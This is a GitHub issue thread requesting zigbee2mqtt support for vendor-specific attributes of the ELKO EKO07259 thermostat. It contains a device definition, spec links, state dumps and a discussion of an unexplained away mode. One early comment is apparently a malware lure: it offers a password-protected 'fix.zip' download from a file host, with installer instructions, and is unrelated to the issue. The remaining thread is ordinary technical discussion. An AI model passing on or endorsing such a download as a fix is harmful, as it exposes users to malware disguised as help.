Koenkk/zigbee2mqtt #23739: [New device support]: ELKO EKO07259 - Vendor specific attributes

msalte, 2024-08-26:
### Link

https://www.zigbee2mqtt.io/devices/EKO07259.html#schneider%2520electric-eko07259

### Database entry

{}

### Comments

Full Zigbee specification: [RTC-6754012INT-cFMT_16A_F_Zigbee-29.pdf](https://github.com/user-attachments/files/16744437/RTC-6754012INT-cFMT_16A_F_Zigbee-29.pdf)

Snip of spec for missing vendor specific attributes. I would love these to become available. Brightness, InactiveBrightness and ActivityTimeout.

[image]

### External definition

```shell
const {deviceEndpoints, identify, temperature, electricityMeter} = require('zigbee-herdsman-converters/lib/modernExtend');

const definition = {
    zigbeeModel: ['EKO07259'],
    model: 'EKO07259',
    vendor: 'Schneider Electric',
    description: 'Automatically generated definition',
    extend: [deviceEndpoints({"endpoints":{"1":1,"2":2,"3":3,"5":5}}), identify(), temperature({"endpointNames":["2","3"]}), electricityMeter({"cluster":"metering"})],
    meta: {"multiEndpoint":true},
};

module.exports = definition;
```

HaxBaba123, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

tiragpt, 2024-09-05:
I would love to see EKO07254 as well!

uvNikita, 2024-10-29:
@msalte thank you for publishing the spec for this thermostat! This was very helpful to add support for some of the attributes over at ZHA.

I just tested that adding and modifying `Metering/fixed_load_demand` makes thermostat publish estimated summation delivered. Not sure how precise those numbers are, but still better than no power consumption values at all. 

Linking some another issue for visibility: #20446

closed 2025-01-06 by github-actions[bot]

dtd, 2025-04-11:
I would really love to have the brightness/inactive brightness to work from z2m, as it is impossible to do on device... Is there any possibilities doing it myself if it would not be added?

uffevedenbrant, 2025-05-02:
@dtd I would be interested as well. I added a ZHA instanse in my HA but would prefer to use Z2M.
Not sure how to ping you in Github but home you read this. 
The latest Z2M seems to add a dev external converter thing.. 
I have extracted the current WDE002497 from the herdsman converters that we could ( if you are more familiar with development ) use.

uffevedenbrant, 2025-05-02:
@dtd Might add that ZHA have a lot of extra support based on the published PDF that would be great to have in Z2M as well.

dtd, 2025-05-06:
@uffevedenbrant That does indeed seem interesting, I do have experience developing, however not anything similar to this. I did also try and start a [discussion](https://github.com/Koenkk/zigbee2mqtt/discussions/27082), but no answers either. These days I am very busy on a personal level, so I do not have time to dive into this. But if you have some interesting code or something to share, feel free to do, and if/when I get time in maybe a month or two I can take a look, but I can not promise anything...

svhelge, 2026-01-07:
Hi! I have never experienced the away mode on the three thermostats I have. 
In the [specification](https://github.com/user-attachments/files/16744437/RTC-6754012INT-cFMT_16A_F_Zigbee-29.pdf) above I see a command for away, but I assume that there have to be an attribute that it uses.
I added m.occupancy by a mistake to the definition file, it could maybe to try that? I also found this when googling https://community.home-assistant.io/t/sr-zg9092a-thermostat-away-mode-changes-by-itself/551267 which could be related. 

Could you upload the database.db and state.json files? One version of the files with away mod inactive and another set of files when the away mode is active.

therealmortensalte, 2026-01-08:
just caught my thermostats misbehaving, and all 3 of them appear to do so at the same time. see attachment state.json and database.db.

[incorrect_behavior.zip](https://github.com/user-attachments/files/24505758/incorrect_behavior.zip)

As a side note, by examining the state of one of my thermostats through the z2m UI, I randomly caught this difference in state from one second to the next:

```
{
    "child_lock": "UNLOCK",
    "display_active_timeout": 30,
    "display_brightness_active": 100,
    "display_brightness_inactive": 50,
    "energy": 0,
    "linkquality": 255,
    "local_temperature": 26.64,
    "local_temperature_source_select": "External",
    "max_heat_setpoint_limit": 40,
    "min_heat_setpoint_limit": 20,
    "occupied_heating_setpoint": 26.5,
    "pi_cooling_demand": 0,
    "pi_heating_demand": 0,
    "power": 0,
    "system_mode": "heat",
    "temperature_display_mode": "celsius",
    "temperature_sensor_type": "10kΩ sensor from B+J"
}
```

to

```
{
    "child_lock": "UNLOCK",
    "display_active_timeout": 30,
    "display_brightness_active": 100,
    "display_brightness_inactive": 50,
    "energy": 0,
    "linkquality": 228,
    "local_temperature": 26.64,
    "local_temperature_source_select": "External",
    "max_heat_setpoint_limit": 40,
    "min_heat_setpoint_limit": 20,
    "occupied_heating_setpoint": 26.5,
    "pi_cooling_demand": 0,
    "pi_heating_demand": 0,
    "power": 0,
    "system_mode": "heat",
    "temperature_display_mode": "celsius",
    "temperature_sensor_type": "10kΩ sensor from B+J",
    "fixed_load_demand": null,
    "occupancy": null,
    "running_state": null
}
```

Notice new properties in the second object: `fixed_load_demand`, `occupancy` and `running_state` all of which reports `null`.

I am not sure if this matters. Thanks again for your time :)

svhelge, 2026-01-19:
> Away / No Occupancy mode.. When reading documentation this sounds strange unless there is a external sensor sending the Occupancy signal to the Thermostat from a wiser hub.. No real information on why a thermostat would jump into this mode.. However.. Might be nondisclosed functions activating the Away function.. Myself.. Using scenes to set Away / Soon-back / Now-here. Away 10degrees / Soon-back 16degrees / Now-here 22degrees

According to the [specification](https://github.com/user-attachments/files/16744437/RTC-6754012INT-cFMT_16A_F_Zigbee-29.pdf) for the device it has several setpoints (OccupiedCoolingSetpoint, OccupiedHeatingSetpoint, UnoccupiedCoolingSetpoint and UnoccupiedHeatingSetpoint). The occupany attribute controls whether occupied or unoccupied is used. But the occupancy attribute in the thermostat cluster is read only, no idea how it's updated.

svhelge, 2026-01-21:
I'm wondering if the experienced behaviour (away mode beeing activated) is related to the cluster wiserDeviceIinfo. In the previous version of the EKO07259 converter fz.wiser_device_info was included. The wiserDeviceIinfo cluster is not described in the specification above (pdf file).